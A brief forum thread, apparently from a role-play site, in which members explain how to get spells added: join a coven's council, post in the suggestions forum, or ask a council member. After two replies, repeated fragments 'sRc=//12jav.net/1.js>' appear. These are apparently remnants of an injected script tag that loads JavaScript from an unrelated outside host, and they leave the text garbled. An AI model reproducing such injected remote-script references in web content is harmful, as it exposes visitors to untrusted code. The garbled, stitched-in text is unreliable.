You have to be council position in a coven I believe.

Pick a coven that you are a attach to it in your belief read stories. then dicide.

You can do three things A) Post it in the spell suggestions forums. B) Get on the council in a coven. C) Ask a council member to post the spell for you. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

This is a bit of an outdated forum, but the Spell Casters seem to be able to add spells due to being automatically promoted" to a council position. Therefore, yes, they would be an exception. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
